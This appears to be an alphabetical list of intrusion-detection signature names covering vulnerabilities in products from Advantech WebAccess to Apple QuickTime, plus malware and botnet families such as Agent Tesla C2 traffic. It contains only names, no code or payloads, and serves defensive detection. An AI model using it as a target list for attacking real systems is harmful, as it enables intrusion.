Advantech-WebAccess-HMI-Designer-Pm3-Nhtrendgraph-Memory-Corruption
Advantech-WebAccess-HMI-Designer-Pm3-Nmultistatelamp-Heap-Buffer-Overflow
Advantech-WebAccess-IOCTL-0x1138b-Stack-Based-Buffer-Overflow
Advantech-WebAccess-IOCTL-10001-Bwflapp-Stack-Based-Buffer-Overflow
Advantech-WebAccess-IOCTL-10001-Bwfrerpt-Stack-Buffer-Overflow
Advantech-WebAccess-IOCTL-10001-Bwimgexe-Stack-Based-Buffer-Overflow
Advantech-WebAccess-Multiple-ActiveX-Vulnerabilities
Advantech-WebAccess-NMS-Configrestoreaction-Arbitrary-File-Upload
Advantech-WebAccess-NMS-Dbbackuprestoreaction-Arbitrary-File-Upload
Advantech-WebAccess-NMS-Download.jsp-Arbitrary-Directory-Traversal
Advantech-WebAccess-NMS-Downloadaction-Directory-Traversal
Advantech-WebAccess-NMS-Fwupgradeaction-Arbitrary-File-Upload
Advantech-WebAccess-NMS-LicenseImportAction-Arbitrary-File-Upload
Advantech-WebAccess-NMS-ProfileResource-importFile-Arbitrary-File-Upload
Advantech-WebAccess-NMS-saveBackgroundAction-Directory-Traversal
Advantech-WebAccess-NMS-Supportdeviceaddaction-Arbitrary-File-Upload
Advantech-WebAccess-Node-Chklogin2-SQL-Injection
Advantech-WebAccess-Node-Webvrpcs-Uninstallwa-Denial-Of-Service
Advantech-WebAccess-Rmtemplate.aspx-SQL-Injection
Advantech-WebAccess-Scada-Bwdlgpup-Arbitrary-File-Deletion
Advantech-WebAccess-Scada-Bwdraw-Out-Of-Bounds-Write
Advantech-WebAccess-Scada-Bwgetval-Arbitrary-File-Deletion
Advantech-WebAccess-Scada-Bwmail-Stack-Based-Buffer-Overflow
Advantech-WebAccess-Scada-Bwmainleft-Cross-Site-Scripting
Advantech-WebAccess-Scada-Bwmakdir-Stack-Based-Buffer-Overflow
Advantech-WebAccess-Scada-Bwnodeip-Stack-Based-Buffer-Overflow
Advantech-WebAccess-SCADA-Bwocxrun.ocx-Command-Execution
Advantech-WebAccess-Scada-Bwopcbs-Stack-Based-Buffer-Overflow
Advantech-WebAccess-Scada-Bwpalarm-IOCTL-70022-Heap-Buffer-Overflow
Advantech-WebAccess-Scada-Bwpalarm-IOCTL-70533-Stack-Based-Buffer-Overflow
Advantech-WebAccess-Scada-Bwpalarm-IOCTL-70538-Stack-Based-Buffer-Overflow
Advantech-WebAccess-Scada-Bwpalarm-IOCTL-70603-Stack-Based-Buffer-Overflow
Advantech-WebAccess-Scada-Bwpalarm-IOCTL-70605-Stack-Based-Buffer-Overflow
Advantech-WebAccess-Scada-Bwpalarm.dll-Stack-Based-Buffer-Overflow
Advantech-WebAccess-Scada-Bwpslinkzip-Stack-Based-Buffer-Overflow
Advantech-WebAccess-Scada-Bwrunmie.exe-Policy-Bypass
Advantech-WebAccess-Scada-Bwrunrpt.exe-Stack-Based-Buffer-Overflow
Advantech-WebAccess-Scada-Bwscrp.exe-Stack-Based-Buffer-Overflow
Advantech-WebAccess-SCADA-bwstwww-Stack-Based-Buffer-Overflow
Advantech-WebAccess-SCADA-Bwthinfl-Stack-Based-Buffer-Overflow
Advantech-WebAccess-Scada-Certupdate.asp-Filename-Directory-Traversal
Advantech-WebAccess-Scada-Giffconv-Stack-Based-Buffer-Overflow
Advantech-WebAccess-Scada-Gmicons-Picfile-Arbitrary-File-Upload
Advantech-WebAccess-Scada-IOCTL-10001-Bwflapp.exe-Arbitrary-File-Deletion
Advantech-WebAccess-Scada-IOCTL-10001-Bwpfile-Arbitrary-File-Deletion
Advantech-WebAccess-SCADA-IOCTL-10001-Bwpslink.exe-Arbitrary-File-Deletion
Advantech-WebAccess-Scada-IOCTL-10012-Stack-Buffer-Overflow
Advantech-WebAccess-Scada-IOCTL-10040-Arbitrary-File-Deletion
Advantech-WebAccess-Scada-Jpegconv-Stack-Based-Buffer-Overflow
Advantech-WebAccess-Scada-Notify2-Stack-Based-Buffer-Overflow
Advantech-WebAccess-SCADA-Password-Parameter-Buffer-Overflow
Advantech-WebAccess-SCADA-Projectname-Parameter-Buffer-Overflow
Advantech-WebAccess-Scada-Wadashboard-Readfile-Directory-Traversal
Advantech-WebAccess-Scada-Wadashboard-Writefile-Arbitrary-File-Overwrite
Advantech-WebAccess-SCADA-Webeye.ocx-IP_Addr-Parameter-Buffer-Overflow
Advantech-WebAccess-SCADA-Webvact.ocx-Accesscode-Buffer-Overflow
Advantech-WebAccess-SCADA-Webvact.ocx-GotoCmd-Buffer-Overflow
Advantech-WebAccess-SCADA-Webvact.ocx-NodeName-Buffer-Overflow
Advantech-WebAccess-SCADA-Webvact.ocx-Username-Buffer-Overflow
Advantech-WebAccess-Soap-Request-SQL-Injection
Advantech-WebAccess-SQL-Injection
Advantech-WebAccess-Stack-Based-Buffer-Overflow
Advantech-WebAccess-Updatetemplate.aspx-SQL-Injection
Advantech-WebAccess-Viewdll1-Heap-Buffer-Overflow
Advantech-WebAccess-Webdobj-ActiveX-Updateproject-Stack-Buffer-Overflow
Advantech-WebAccess-Webvrpcs-Arbitrary-File-Deletion
Advantech-WebAccess-Webvrpcs-Directory-Traversal-Remote-Code-Execution
Advantech-WebAccess-Webvrpcs-Projectname-Buffer-Overflow
Advantech-WebAccess-Webvrpcs-Service-BwWebSvc.dll-Buffer-Overflow
Advantech-WebAccess-Webvrpcs-Service-Function-0x013c71-Buffer-Overflow
Advantech-WebAccess-Webvrpcs-Service-Function-0x013c80-Buffer-Overflow
Advantech-WebAccess-Webvrpcs-Service-Strncpy-Buffer-Overflow
Advantech-WISE-PaaS-RMM-Accountmgmt-Activateaccount-External-Entity-Injection
Advantech-WISE-PaaS-RMM-DeviceMgmt-fuzzySearch-SQL-Injection
Advantech-WISE-PaaS-RMM-Recoverymgmt-Checkschname-External-Entity-Injection
Advantech-WISE-PaaS-RMM-SQLMgmt-getTableInfo-SQL-Injection
Advantech-WISE-PaaS-RMM-SQLMgmt-Qrydata-SQL-Injection
Advantech-WISE-PaaS-RMM-Upgrademgmt-Upload_ota-Arbitrary-File-Upload
Advantech-WISE-PaaS-RMM-upload2eMap-LastMapName-Arbitrary-File-Upload
Advantech-WISE-PaaS-RMM-Wechatsignin-Wechattokenlogin-External-Entity-Injection
Advantive-VeraCore-PmSess1-SQL-Injection-CVE-2025-25181
Adware-180sa
Adware-Adroar
Adware-Adtomi
Adware-Bdsearch
Adware-Casclient
Adware-Commonname
Adware-Exactsearch
Adware-Ilookup
Adware-mysearch
Adware-Pornkings
Adware-Rapidblaster
Adware-Searchaid
Adware-Searchcentrix
Adware-Sidesearch
Adware-Slotch
Adware-Tickerbar
Adware-Toolbarcc
Adware-Tvmedia
Adware-Websearch
Aerohive-NetConfig-LFI-And-Log-Poisoning-To-RCE
Aerospike-Database-Server-As_Sindex-Simatch_By_Iname-Stack-Buffer-Overflow
Aerospike-Database-Server-Rw-Fabric-Message-Code-Execution
Aerospike-Database-Server-Stack-Buffer-Overflow-CVE-2016-9054
Agent-Tesla-C2-Traffic
Agent-Tesla-Malware-Infection-Traffic
Agent-Tesla-Panel-Remote-Code-Execution
Agent-Tesla-SMTP-Traffic
AgentX++-Receive-PDU-Integer-Overflow
Agilent-Technologies-Feature-Extraction-ActiveX-Index-Boundary-Error
Agobot
Agora-Cgi-Cross-Site
Ahsay-Backup-Insecure-File-Upload
Aim-Express-Usage
AIM-Triton-CSeq-Buffer-Overflow
Ainslot.b-Malware
Aiohttp-Directory-Traversal-CVE-2024-23334
AirTies-RT-104-Router-Unauthorized-Config-Download
AirTies-RT-Series-Routers-Hardcoded-Credentials-Vulnerability
AIS-logistics-ESEL-Server-RCE
AIX-Rlogin-Froot
AJ-Report-Authentication-Bypass-CVE-2024-7314
AjaxPro-Deserialization-Remote-Code-Execution
Ajenti-Auth-Username-Command-Injection
Al3na.hotgirls-Botnet
Al3na.monster-Botnet
Al3na.weakpatheticfool-Botnet
Alcatel-OmniPCX-Enterprise-Remote-Command-Execution
Aldi-Bot
Alibaba-Nacos-Authfilter-Authentication-Bypass
Alibaba-Nacos-ConfigOpsController-Authentication-Bypass
Alienvault-Ossim-Arbitrary-Command-Injection
Alienvault-Ossim-AV-Centerd-Soap-Requests-Multiple-Command-Execution
Alienvault-Ossim-AV-Centerd-Util.pm-Get_License-Arbitrary-Command-Execution
Alienvault-Ossim-AV-Centerd-Util.pm-Remote_Task-Arbitrary-Command-Execution
Alienvault-Ossim-AV-Centerd-Util.pm-Request-Arbitrary-Command-Execution
Alienvault-Ossim-Framework-Backup-Command-Execution
Alienvault-Unified-Security-Management-And-Ossim-Gauge.php-SQL-Injection
Alienvault-Unified-Security-Management-AV-Remote-Code-Execution
Alienvault-USM/OSSIM-Unauthenticated-Command-Injection
Allegra-Excel-Import-Insecure-Deserialization
Allegra-Ganttandschexportaction-Directory-Traversal
Allegra-Getfilecontentasstring-Directory-Traversal
Allegra-Siteconfigaction-Improper-Access-Control
Allen-Bradley-PCCC-Protocol-DoS
Allied-Telesyn-TFTP-Server-Buffer-Overflow
ALLMediaServer-SEH-Buffer-Overflow
Alpha-Networks-ASL-26555-Wireless-Router-Password-Disclosure
Alt-N-MDaeamon-Buffer-Overflow-Vulnerability
Alt-N-MDaemon-IMAP-Server-Fetch-Command-Buffer-Overflow
Alt-N-MDaemon-Worldclient-Service-Memory-Corruption
Alt-N-Technologies-SecurityGateway-Usename-BOF
Alt-N-Technologies-SecurityGateway-Username-Buffer-Overflow
Alt-N-WebAdmin-User-Parameter-BOF
Altnet-Download-Manager-ADM4-ActiveX-Control-Buffer-Overflow
Altnet-Peer-Points-Manager
Altnet-Topsearch
Alueron
Amcrest-Dahua-NVR-Camera-Denial-Of-Service
Amlib-NetOPAC-Stack-Remote-Buffer-Overflow
AmmSoft-ScriptFTP-Buffer-Overflow
AMX-NetLinx-VNC-ActiveX-Control-Buffer-Overflow
Analogx-SimpleServer-Msdos-Device-Name-DoS
Android-Content-Provider-File-Disclosure
Android-Gingermaster
Android-Spyeye-Trojan
Android-Stiniter.a
Android.Backdoor.Acnetsteal-Botnet
Android.Backdoor.Obad.a-Botnet
Android.Spyware.Ksapp.A-Botnet
Android.Spyware.Mobilespy.a-Botnet
Android.Spyware.TheftSpy-Botnet
Android.Trojan.FakeInst.BL-Botnet
Android.Trojan.FakeLookout-Botnet
Android.Trojan.SMSreg-Botnet
Android.Trojan.Stealer-Botnet
Android.Trojan.Uranico-Botnet
Android/Bgserv-Malware
Ani-Windows-Animated-Cursor-Code-Execution
Ani-Windows-Animationheader-Length-Buffer-Overflow
Ani-Windows-Zero-Frame-Or-Rate-Number-Ani-File-Denial-Of-Service
ANT-Studio-Web-Server-Denial-Of-Service
Anviz-CrossChex-Buffer-Overflow
AnyDesk-GUI-Format-String-Write
AOL-Desktop-Rtx-File-Parsing-Buffer-Overflow
AOL-Explorer-ActiveX-Vulnerable-Function-Call
AOL-Instant-Messenger-Away-Message-Buffer-Overflow
AOL-Instant-Messenger-Usage
AOL-Phobox-Playlist-ActiveX-Component-Buffer-Overflow
AOL-Radio-AmpX-ActiveX-Control-Buffer-Overflow
AOL-Radio-AmpX-ActiveX-Control-ControlFile-Buffer-Overflow
AOL-SuperBuddy-ActiveX-Control-Function-Deference
Apache-1.3-Mod_Proxy-Buffer-Overflow
Apache-2-Mod_SSL-Connection-Abort-Denial-Of-Service
Apache-Activemq-Authenticated-Arbitrary-Code-Execution-CVE-2022-41678
Apache-Activemq-File-Disclosure
Apache-Activemq-File-Upload-Directory-Traversal
Apache-Activemq-Fileserver-File-Upload-Directory-Traversal
Apache-Activemq-Fileserver-Move-Directory-Traversal
Apache-Activemq-Jmx-Rmiconnectorserver-Remote-Code-Execution
Apache-Activemq-OpenWire-Insecure-Deserialization-CVE-2023-46604
Apache-Activemq-Shutdown-Command-Denial-Of-Service
Apache-Activemq-Web-Console-Message.jsp-Cross-Site-Scripting
Apache-Activemq-Web-Console-Queuefilter-Cross-Site-Scripting
Apache-Airflow-Celery-Broker-RCE-CVE-2020-11981
Apache-Airflow-Dag-OS-Command-Injection
Apache-Airflow-Dag-Run_Id-Command-Injection
Apache-Airflow-Experimental-API-Authentication-Bypass-CVE-2020-13927
Apache-Airflow-Origin-Cross-Site-Scripting
Apache-Airflow-Remote-Code-Execution-CVE-2020-11978
Apache-APISIX-Admin-API-Default-Access-Token-RCE
Apache-APISIX-Batch-Requests-Plugin-IP-Restriction-Bypass
Apache-APISIX-Dashboard-Middleware-Authentication-Bypass
Apache-Apr-Apr_Fnmatch-Stack-Overflow-DOS
Apache-Apr-Util-IPv6-URI-Parsing
Apache-Apr-Util-IPv6-URI-Parsing-Vulnerability
Apache-Axis-Jsp-File-Upload
Apache-Axis-Soap-Array-Exhaustion
Apache-Axis-Soap-Web-Services-Denial-Of-Service
Apache-Byte-Range-Filter-Denial-Of-Service
Apache-Camel-Filter-Bypass-CVE-2025-27636
Apache-Camel-Filter-Bypass-CVE-2025-29891
Apache-Camel-XSLT-Component-Java-Code-Execution
Apache-Camel-XSLT-Component-Xml-External-Entity
Apache-Cloudstack-Saml-Authentication-Bypass
Apache-Commons-Collections-Object-Deserialization-Code-Execution-Vulnerability
Apache-Commons-Fileupload-Parserequest-Denial-Of-Service
Apache-Commons-Text-Remote-Code-Execution-CVE-2022-42889
Apache-Continuum-Command-Injection
Apache-Couchdb-Config-Command-Execution
Apache-Couchdb-Config-Command-Execution-CVE-2018-8007
Apache-Couchdb-Erlang-RCE
Apache-Couchdb-JSON-Remote-Privilege-Escalation
Apache-Cxf-Services-Stylesheetpath-Cross-Site-Scripting
Apache-Druid-Javascriptdimfilter-Remote-Code-Execution
Apache-Druid-JDBC-Connection-Properties-Remote-Code-Execution
Apache-Druid-JNDI-Injection-RCE
Apache-Dubbo-Httpremoteinvocation-Insecure-Deserialization
Apache-Dubbo-Routing-Configuration-Unsafe-YAML-Unmarshalling
Apache-Dubbo-Script-Routing-Remote-Code-Execution
Apache-Fineract-Imagesapiresource-Arbitrary-File-Upload
Apache-Flink-CVE-2020-17519
Apache-Flink-FileUploadHandler-Arbitrary-File-Upload
Apache-Flink-JAR-Upload-Java-Code-Execution
Apache-HTTP-Server-Illegal-Character-File-Disclosure
Apache-HTTP-Server-Mod-Cache-Module-Denial-Of-Service
Apache-HTTP-Server-Mod-Dav-Merge-Request-Denial-Of-Service
Apache-HTTP-Server-Mod-Negotiation-Filename-Handling-Cross-Site-Scripting
Apache-HTTP-Server-Mod_Cache-Denial-Of-Service
Apache-HTTP-Server-Mod_Deflate-Denial-Of-Service
Apache-HTTP-Server-Mod_log_Config-Denial-Of-Service
Apache-HTTP-Server-Mod_Proxy-Denial-Of-Service
Apache-HTTP-Server-Mod_Proxy_FTP-Wildcard-Characters-XSS
Apache-HTTP-Server-Mod_Rewrite-Rewritelog-Command-Execution
Apache-HTTP-Server-Mod_rpaf-X-Forwarded-For-Denial-Of-Service
Apache-HTTP-Server-Mod_status-Heap-Buffer-Overflow
Apache-HTTP-Server-Mod_tcl-Module-Format-String-Vulnerability
Apache-HTTP-Server-Msdos-Device-Name-DoS
Apache-HTTP-Server-Path-Traversal-CVE-2021-41773
Apache-Httpd-Apr_FilePath_Merge-Ntlm-Relay
Apache-Httpd-Ap_Find_Token-Out-Of-Bounds-Read
Apache-Httpd-Error-Code-400-Httponly-Cookie-Handling-Information-Disclosure
Apache-Httpd-Filesmatch-Directive-Security-Restriction-Bypass
Apache-Httpd-HTTP2-Cache-Digest-Header-Parsing-Memory-Corruption
Apache-Httpd-Mod_Auth_Digest-Memory-Access-Denial-Of-Service
Apache-Httpd-Mod_Cache_socache-Denial-Of-Service
Apache-Httpd-Mod_Cgi-Handler-Confusion
Apache-Httpd-Mod_HTTP2-H2_Session_process-Denial-Of-Service
Apache-Httpd-Mod_HTTP2-Null-Pointer-Dereference
Apache-Httpd-Mod_Log_Config-Cookie-Handling-Denial-Of-Service
Apache-Httpd-Mod_Lua-req_parsebody-Denial-Of-Service
Apache-Httpd-Mod_Lua-req_parsebody-Integer-Underflow
Apache-Httpd-Mod_Md-Null-Pointer-Dereference
Apache-Httpd-Mod_Proxy-Ap_Proxy_Get_Worker_ex-Null-Pointer-Dereference
Apache-Httpd-Mod_Proxy-Security-Bypass
Apache-Httpd-Mod_Proxy-Unix-Socket-Path-Handling-Server-Side-Request-Forgery
Apache-Httpd-Mod_Proxy_ajp-Denial-Of-Service
Apache-Httpd-Mod_Proxy_balancer-Cross-Site-Scripting
Apache-Httpd-Mod_remoteip-Buffer-Overflow
Apache-Httpd-Mod_sed-CVE-2022-30522-Denial-of-Service
Apache-Httpd-Mod_sed-Integer-Overflow
Apache-Httpd-Mod_SSL-TLS-Renegotiation-Denial-Of-Service
Apache-Httpd-Multiple-Mime-Headers-DoS
Apache-Httpd-Range-Header-Field-Memory-Exhaustion
Apache-Hugegraph-Gremlin-Code-Injection-CVE-2024-27348
Apache-ISAPI-Module-Dangling-Pointer
Apache-James-Server-Insecure-User-Creation
Apache-Jetspeed-Pagemanagementservice-Cross-Site-Scripting
Apache-Jetspeed-Portal-Site-Manager-Zip-File-Upload-Directory-Traversal
Apache-Jetspeed-Portal-URI-Path-Cross-Site-Scripting
Apache-Jetspeed-Rest-API-Unauthorized-User-Modification
Apache-Jetspeed-SQL-Injection
Apache-Jspwiki-Ajaxpreview-Reflected-Cross-Site-Scripting
Apache-Jspwiki-Upload-Stored-Cross-Site-Scripting
Apache-Jspwiki-Userpreferences-Cross-Site-Request-Forgery
Apache-Jspwiki-Weblogplugin-Stored-Cross-Site-Scripting
Apache-Jspwiki-Xhrhtml2markup-Reflected-Cross-Site-Scripting
Apache-Kylin-Getsparksubmitcmd-Command-Injection
Apache-Kylin-Rest-API-Admin-Configuration-Information-Disclosure
Apache-Kylin-Rest-API-Diagnosisservice-Command-Injection
Apache-Kylin-Rest-API-Migratecube-Command-Injection
Apache-Kylin-Runsparksubmit-Command-Injection
Apache-Log4j-JDBC-Appender-JNDI-Injection
Apache-Log4j-SocketServer-Untrusted-Deserialization
Apache-Mod-Imagemap-Module-Cross-Site-Scripting
Apache-Mod-Include-Buffer-Overflow
Apache-Mod-Ssl-Log-Function-Format-String
Apache-Mod_Auth_Pgsql-Module-Logging-Facility-Format-String-Errors
Apache-Mod_ssl-Ssl_Util_uuencode_Binary-Buffer-Overflow-Vulnerability
Apache-NiFi-API-Remote-Code-Execution
Apache-NiFi-H2-Connection-String-Remote-Code-Execution
Apache-NiFi-Parameter-Context-Stored-Cross-Site-Scripting
Apache-Ofbiz-Authentication-Bypass-CVE-2023-51467
Apache-Ofbiz-Createanoncontact-Server-Side-Template-Injection
Apache-Ofbiz-CVE-2021-26295-Insecure-Deserialization
Apache-Ofbiz-CVE-2021-30128-Insecure-Deserialization
Apache-Ofbiz-CVE-2023-49070-XmlRpc-Insecure-Deserialization
Apache-Ofbiz-CVE-2024-36104-Directory-Traversal
Apache-Ofbiz-Forgot-Password-Directory-Traversal
Apache-Ofbiz-Loadjwt-Authentication-Bypass-CVE-2024-25065
Apache-Ofbiz-Servicecontext-Xstream-Insecure-Deserialization
Apache-Ofbiz-SSRF-And-Remote-Code-Execution-CVE-2024-45507
Apache-Ofbiz-Stream-Contentid-Cross-Site-Scripting
Apache-Ofbiz-Unauthenticated-Endpoint-Code-Execution-CVE-2024-38856
Apache-Ofbiz-Unauthenticated-Endpoint-Code-Execution-CVE-2024-45195
Apache-Ofbiz-XmlRpc-Insecure-Deserialization
Apache-Olingo-XML-External-Entity-Injection
Apache-OpenMeetings-Cluster-Mode-Insecure-Deserialization-CVE-2024-54676
Apache-OpenMeetings-Event-Description-Cross-Site-Scripting
Apache-OpenMeetings-Nettest-Download-Upload-Size-Denial-Of-Service
Apache-OpenMeetings-Nettest-Web-Service-Denial-Of-Service
Apache-OpenMeetings-Zip-File-Path-Traversal
Apache-OpenOffice-Dbase-File-Handling-Buffer-Overflow
Apache-OpenOffice-Text-Document-Malicious-Macro-Execution
Apache-Pluto-Portletv3annotateddemo-Multipartportlet-Arbitrary-File-Upload
Apache-Pulsar-JSON-Web-Token-Authentication-Bypass
Apache-Pulsar-Unpack-Directory-Traversal
Apache-Qpid-Sequence-Set-Denial-Of-Service
Apache-Qpid-Session.gap-Denial-Of-Service
Apache-Rave-User-Information-Disclosure
Apache-RocketMQ-Buildstartcommand-Command-Injection
Apache-RocketMQ-Nameserver-configStorePath-Arbitrary-File-Write
Apache-Roller-OGNL-Injection-Remote-Code-Execution
Apache-Root-Privilege-Escalation
Apache-Santuario-Xml-Security-For-Java-Dtd-Denial-Of-Service
Apache-Shardingsphere-SnakeYaml-Insecure-Deserialization
Apache-ShenYu-Admin-JWT-Authentication-Bypass-Vulnerability
Apache-ShenYu-Plugin-API-Information-Disclosure
Apache-Shiro-Remote-Code-Execution
Apache-SkyWalking-Alarm-Wildcard-Search-Graphql-SQL-Injection
Apache-SkyWalking-Graphql-Protocol-SQL-Injection
Apache-Solr-Config-API-Insecure-Deserialization
Apache-Solr-Configset-Upload-Directory-Traversal
Apache-Solr-Configsets-Arbitrary-File-Upload-CVE-2023-50386
Apache-Solr-Configsets-Xml-External-Entity-Expansion-Information-Disclosure
Apache-Solr-Data-Import-Handler-XML-External-Entity-Information-Disclosure
Apache-Solr-Dataimporthandler-Remote-Code-Execution
Apache-Solr-Fake-URL-Authentication-Bypass
Apache-Solr-Remote-Code-Execution
Apache-Solr-Replicationhandler-Server-Side-Request-Forgery
Apache-Solr-Solrresourceloader-Directory-Traversal
Apache-Solr-Xmlparser-XML-External-Entity-Expansion-Remote-Code-Execution
Apache-Source-Asp-File-Disclosure
Apache-Spark-Auth-enabled-Standalone-Master-Command-Execution
Apache-Spark-Getunixgroups-Command-Injection
Apache-Ssl-DoS-With-Plain-HTTP-Request
Apache-Storm-Gettopologyhistory-Command-Injection
Apache-Struts-2-Commons-Fileupload-Insecure-Deserialization
Apache-Struts-2-Conversionerrorinterceptor-OGNL-Script-Injection
Apache-Struts-2-Cookieinterceptor-OGNL-Script-Injection
Apache-Struts-2-Developer-Mode-OGNL-Execution
Apache-Struts-2-Parametersinterceptor-OGNL-Command-Execution
Apache-Struts-2-Rest-Plugin-Xstream-Denial-Of-Service
Apache-Struts-2-Rest-Plugin-Xstreamhandler-Insecure-Deserialization
Apache-Struts-2-Struts-1-Plugin-Remote-Code-Execution
Apache-Struts-Actionform-Classloader-Security-Bypass
Apache-Struts-Classloader-Manipulation-Remote-Code-Execution
Apache-Struts-Cookieinterceptor-Classloader-Security-Bypass
Apache-Struts-Dynamic-Method-Invocation-Remote-Code-Execution
Apache-Struts-File-Upload-Vulnerability-CVE-2023-50164
Apache-Struts-File-Upload-Vulnerability-CVE-2024-53677
Apache-Struts-Jakarta-Multipart-Parser-Remote-Code-Execution
Apache-Struts-OGNL-Expressions-DefaultActionMapper-Code-Execution
Apache-Struts-OGNL-Remote-Code-Execution
Apache-Struts-OGNL-Remote-Code-Execution-CVE-2020-17530
Apache-Struts-Parametersinterceptor-Classloader-Security-Bypass
Apache-Struts-RCE-CVE-2018-11776
Apache-Struts-Rest-Plugin-DMI-Code-Execution
Apache-Struts-Url-And-Anchor-Tag-Includeparams-OGNL-Command-Execution
Apache-Struts-Urlvalidator-Denial-Of-Service
Apache-Struts-Wildcard-Matching-OGNL-Code-Execution
Apache-Struts-Xsltresult-File-Inclusion
Apache-Struts2-File-Upload-DoS
Apache-Subversion-Mod_authz_SVN-Copy-Move-Denial-Of-Service
Apache-Subversion-Mod_Dav_SVN-Denial-Of-Service
Apache-Subversion-Mod_Dav_SVN-Integer-Overflow
Apache-Subversion-SVN-Protocol-Parser-Integer-Overflow
Apache-Subversion-SVN-SSH-Url-Command-Execution
Apache-Superset-Import-Dashboards-CVE-2018-8021
Apache-Superset-Insecure-Deserialization-CVE-2023-37941
Apache-Superset-Markdown-Component-Stored-Cross-Site-Scripting
Apache-Superset-Sqlite-URI-Bypass-CVE-2023-39265
Apache-Superset-Unrestricted-Database-Import-CVE-2023-39265
Apache-Superset-Url-Shortener-Open-Redirect
Apache-SVN-Authzsvnreposrelativeaccessfile-Null-Pointer-Dereference
Apache-Tapestry-Classpathassetrequesthandler-Information-Disclosure
Apache-Tapestry-ContextAssetRequestHandler-Information-Disclosure
Apache-Tika-Chmparser-Denial-Of-Service
Apache-Tika-Header-Command-Injection
Apache-Tika-Server-Command-Injection-Vulnerability
Apache-Tomcat-ajp-Local-File-Inclusion
Apache-Tomcat-Allowlinking-Uriencoding-Directory-Traversal
Apache-Tomcat-CGIServlet-enableCmdLineArguments-RCE
Apache-Tomcat-Chunked-Transfer-Denial-Of-Service
Apache-Tomcat-Chunkedinputfilter-Denial-Of-Service
Apache-Tomcat-Chunkedinputfilter-Malformed-Chunk-Size-Denial-Of-Service
Apache-Tomcat-Default-Servlet-Open-Redirect
Apache-Tomcat-Directory-Listing-Information-Disclosure
Apache-Tomcat-Fileupload-Content-Type-Header-Infinite-Loop
Apache-Tomcat-Formauthenticator-Open-Redirect
Apache-Tomcat-getCanonicalPath-Remote-Code-Execution-CVE-2024-56337
Apache-Tomcat-HTTP-Put-Windows-Remote-Code-Execution
Apache-Tomcat-HTTP2-Denial-of-Service
Apache-Tomcat-HTTP2parser-Denial-Of-Service-CVE-2024-24549
Apache-Tomcat-Insecure-Deserialization-CVE-2025-24813
Apache-Tomcat-JmxRemoteLifecycleListener-Remote-Code-Execution-CVE-2016-8735
Apache-Tomcat-Large-Chunked-Transfer-Denial-Of-Service
Apache-Tomcat-Manager-Authenticated-Upload-Code-Execution
Apache-Tomcat-Maxparametercount-Denial-Of-Service
Apache-Tomcat-Mod_jk.so-URI-Worker-Long-Url-Buffer-Overflow
Apache-Tomcat-Servlet-Engine-Directory-Traversal
Apache-Tomcat-Transfer-Encoding-Information-Disclosure
Apache-Tomcat-User-Enumeration
Apache-Tomcat-WebSocket-Infinite-Loop-DoS
Apache-Traffic-Control-Deliveryservice_Request_Comments-SQL-Injection
Apache-Traffic-Server-Esi-Plugin-Cookie-Header-Information-Disclosure
Apache-Traffic-Server-HTTP-Range-Denial-Of-Service
Apache-Unomi-CVE-2020-13942-RCE
Apache-Zeppelin-WebsocketEventFactory-Stored-Cross-Site-Scripting
Appian-Enterprise-Business-Suite-DoS
Apple-CUPS-Cupsd-Privilege-Escalation
Apple-CUPS-Cupsddoselect-Remote-Code-Execution
Apple-CUPS-Gif_Read_LZW-Heap-Buffer-Overflow
Apple-CUPS-IPP-Use-After-Free-Memory-Corruption
Apple-CUPS-PNG-Filter-Overly-Large-Image-Height-Integer-Overflow
Apple-CUPS-Sgi-Image-Format-Decoding-Imagetops-Filter-Buffer-Overflow
Apple-CUPS-Web-Interface-URL-Handling-Cross-Site-Scripting
Apple-CUPS-Web-Interface-Url-Handling-Cross-Site-Scripting-CVE-2015-1159
Apple-Finder-Dmg-Volume-Name-Memory-Corruption
Apple-Ichat-Bonjour-Invalid-Pshs-Field-Denial-Of-Service
Apple-iOS-Libtiff-Buffer-Overflow
Apple-iTunes-M3u-Playlist-Multiple-Buffer-Overflows
Apple-iTunes-Playlist-File-Parsing-Buffer-Overflow
Apple-iTunes-Playlist-Handling-Buffer-Overflow
Apple-iTunes-Protocol-Handler-Stack-Buffer-Overflow
Apple-Mac-OS-X-Gifgetbandproc-Gif-Image-Handling-Integer-Overflow
Apple-Mac-OS-X-Installer-Package-Filename-Format-String-Vulnerability
Apple-Mac-OSX-DS-Store-Directory-Information-Disclosure
Apple-MacOS-ImageIO-Jp2-File-Parsing-Heap-Buffer-Overflow-CVE-2024-44176
Apple-MacOS-ImageIO-Psd-File-Parsing-Heap-Buffer-Overflow-CVE-2024-40777
Apple-OS-X-SceneKit-Buffer-Overflow-CVE-2015-3783
Apple-Products-Sslverifysignedserverkeyexchange-Security-Feature-Bypass
Apple-QTVR-Sample-Atoms-Movie-File-Handling-Buffer-Overflow
Apple-QuickDraw-GetSrcBits32ARGB-Memory-Corruption
Apple-QuickTime-ActiveX-Control-Clear-Method-Use-After-Free
Apple-QuickTime-Alis-Volume-Name-Parsing-Stack-Buffer-Overflow
Apple-QuickTime-And-iTunes-Heap-Memory-Corruption
Apple-QuickTime-BMP-Handling-Buffer-Overflow
Apple-QuickTime-Color-Table-Id-Heap-Corruption
Apple-QuickTime-Crafted-HTTP-Error-Response-Buffer-Overflow
Apple-QuickTime-Crgn-Atom-Parsing-Memory-Corruption
Apple-QuickTime-Enof-Atom-Parsing-Heap-Buffer-Overflow
Apple-QuickTime-FlashPix-File-Buffer-Overflow
Apple-QuickTime-FlashPix-Movie-File-Integer-Overflow
Apple-QuickTime-Flic-Animation-File-Buffer-Overflow
Apple-QuickTime-FlipFileTypeAtomBton-Integer-Underflow
Apple-QuickTime-FPX-File-Parsing-CVE-2016-1767-Memory-Corruption
Apple-QuickTime-FPX-File-Parsing-CVE-2016-1768-Memory-Corruption
Apple-QuickTime-Ftab-Atom-Stack-Buffer-Overflow
Apple-QuickTime-Image-Description-Atom-Sign-Extension-Memory-Corruption
Apple-QuickTime-Image-Descriptor-Atom-Parsing-Memory-Corruption
Apple-QuickTime-JPEG-2000-Cod-Length-Integer-Underflow
Apple-QuickTime-Media-Content
Apple-QuickTime-Mjpeg-Frame-Stsd-Atom-Heap-Overflow
Apple-QuickTime-Mov-File-Hreftrack-Cross-Zone-Scripting
Apple-QuickTime-Mov-File-JVTCompEncodeFrame-Heap-Overflow
Apple-QuickTime-Mov-File-String-Handling-Integer-Overflow
Apple-QuickTime-Movie-File-Clipping-Region-Handling-Heap-Buffer-Overflow
Apple-QuickTime-Movie-With-Embedded-Script
Apple-QuickTime-MP4-Absent-Stbl-Box-Memory-Corruption
Apple-QuickTime-MPEG-Stream-Padding-Buffer-Overflow
